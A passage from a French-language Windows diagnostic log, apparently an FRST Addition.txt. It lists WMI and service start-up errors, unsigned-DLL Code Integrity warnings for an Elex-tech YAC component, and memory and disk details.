05:01:43 PM) (Source: Microsoft-Windows-WMI) (EventID: 4) (User: AUTORITE NT) Description: Erreur 0x8004401e rencontrée lors de la tentative de chargement du MOF C:\WINDOWS\SYSTEM32\WBEM\EN-US\DSCCORE.MFL pendant la récupération d’un fichier .MOF désigné pour une récupération automatique. Error: (04/21/2017 05:01:43 PM) (Source: Microsoft-Windows-WMI) (EventID: 4) (User: AUTORITE NT) Description: Erreur 0x8004401e rencontrée lors de la tentative de chargement du MOF C:\WINDOWS\SYSTEM32\WBEM\EN-US\STORAGEWMI_PASSTHRU.MFL pendant la récupération d’un fichier .MOF désigné pour une récupération automatique. Error: (04/21/2017 05:01:43 PM) (Source: Microsoft-Windows-WMI) (EventID: 4) (User: AUTORITE NT) Description: Erreur 0x8004401e rencontrée lors de la tentative de chargement du MOF C:\WINDOWS\SYSTEM32\WBEM\EN-US\STORAGEWMI.MFL pendant la récupération d’un fichier .MOF désigné pour une récupération automatique. Erreurs système: ============= Error: (04/22/2017 06:07:44 AM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: Le service HP Support Solutions Framework Service est en attente de démarrage. Error: (04/22/2017 06:02:17 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Le service Kitty n’a pas pu démarrer en raison de l’erreur : Le fichier spécifié est introuvable. Error: (04/22/2017 06:02:17 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Le service Freemake Improver n’a pas pu démarrer en raison de l’erreur : Le service n’a pas répondu assez vite à la demande de lancement ou de contrôle. Error: (04/22/2017 06:02:17 AM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Le dépassement de délai (30000 millisecondes) a été atteint lors de l’attente de la connexion du service Freemake Improver. Error: (04/22/2017 06:01:11 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Le service Realtek Audio Service n’a pas pu démarrer en raison de l’erreur : Le fichier spécifié est introuvable. Error: (04/22/2017 01:01:38 AM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Le service Freemake Improver s’est terminé de façon inattendue pour la 1ème fois. Error: (04/22/2017 01:00:50 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Le service Kitty n’a pas pu démarrer en raison de l’erreur : Le fichier spécifié est introuvable. Error: (04/22/2017 01:00:22 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Le service Realtek Audio Service n’a pas pu démarrer en raison de l’erreur : Le fichier spécifié est introuvable. Error: (04/21/2017 06:35:34 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Le service Update Service(FirefoxU) n’a pas pu démarrer en raison de l’erreur : Accès refusé. Error: (04/21/2017 06:30:06 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Le service Kitty n’a pas pu démarrer en raison de l’erreur : Le fichier spécifié est introuvable. CodeIntegrity: =================================== Date: 2017-04-18 10:41:19.325 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements. Date: 2017-04-18 10:41:12.039 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements. Date: 2017-04-18 10:41:11.477 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements. Date: 2017-04-18 10:41:03.272 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements. Date: 2017-04-18 10:41:03.203 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements. Date: 2017-04-18 10:40:55.637 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements. Date: 2017-04-18 10:40:49.889 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements. Date: 2017-04-18 10:40:49.564 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements. Date: 2017-04-18 10:40:42.254 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements. Date: 2017-04-18 07:29:45.916 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements. ==================== Infos Mémoire =========================== Processeur: AMD E1-1200 APU with Radeon(tm) HD Graphics Pourcentage de mémoire utilisée: 53% Mémoire physique - RAM - totale: 3684.74 MB Mémoire physique - RAM - disponible: 1700.89 MB Mémoire virtuelle totale: 4324.74 MB Mémoire virtuelle disponible: 2358.43 MB ==================== Lecteurs ================================ Drive c: (TI30986800A) (Fixed) (Total:287.34 GB) (Free:238.39 GB) NTFS ==================== MBR & Table des partitions ================== ======================================================== Disk: 0 (Size: 298.1 GB) (Disk ID: 00000000) Partition: GPT. ==================== Fin de Addition.txt ============================